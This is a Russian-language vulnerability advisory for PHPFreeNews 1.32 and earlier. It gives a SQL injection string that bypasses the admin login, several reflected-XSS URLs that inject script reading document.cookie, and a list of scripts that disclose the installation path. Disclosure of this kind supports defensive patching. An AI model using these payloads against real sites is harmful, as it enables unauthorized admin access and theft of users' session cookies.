Программа: PHPFreeNews 1.32 и более ранние версии
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.
1. Удаленный пользователь может послать специально сформированный запрос приложению и выполнить произвольные SQL команды в базе данных.
Пример:
login: Admin
password: ') or isnull(1/0) or ('a'='a
2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/[path]/inc/Footer.php?ScriptVersion= < script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php? FullNews DisplayMode=3& NewsDir=")}//--></script>
<script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php? EnableRatings=1&NewsDir=" )}//--></script><script>
alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&NewsDir=" )}//--></script><script>
alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php? FullNewsDisplayMode=3&PopupWidth=")}//--></script>
<script>alert(document.cookie)</script>
http://[target]/[path]/inc/Script Functions.php? FullNewsDisplayMode=3&PopupHeight=")}//--></script>
<script>alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupWidth=")}//--></script><script>
alert(document.cookie)</script>
http://[target]/[path]/inc/ScriptFunctions.php? EnableComments=1&PopupHeight=")}//--></script>
<script>alert(document.cookie)</script>
3. Удаленный пользователь может непосредственно обратится к сценарию и получить данные об установочной директории приложения на системе. Уязвимые сценарии:
http://[target]/[path]/inc/ArchiveOldNews.php
http://[target]/[path]/inc/Categori es.php
http://[target]/[path]/inc/CheckLogout.php
http://[target]/[path]/inc/CommentsApproval.php
http://[target]/[path]/inc/Images.php
http://[target]/[path]/inc/New sList.php
http://[target]/[path]/inc/Password.php
http://[target]/[path]/inc/Post.php
http://[target]/[path]/inc/PostsApproval.php
http://[target]/[path]/inc/PurgeOld News.php
http://[target]/[path]/inc/SetSticky.php
http://[target]/[path]/inc/SetVisible.php
http://[target]/[path]/inc/Statistics.php
http://[target]/[path]/inc/Templ ate.php
http://[target]/[path]/inc/UserDefinedCodes.php
http://[target]/[path]/inc/Users.php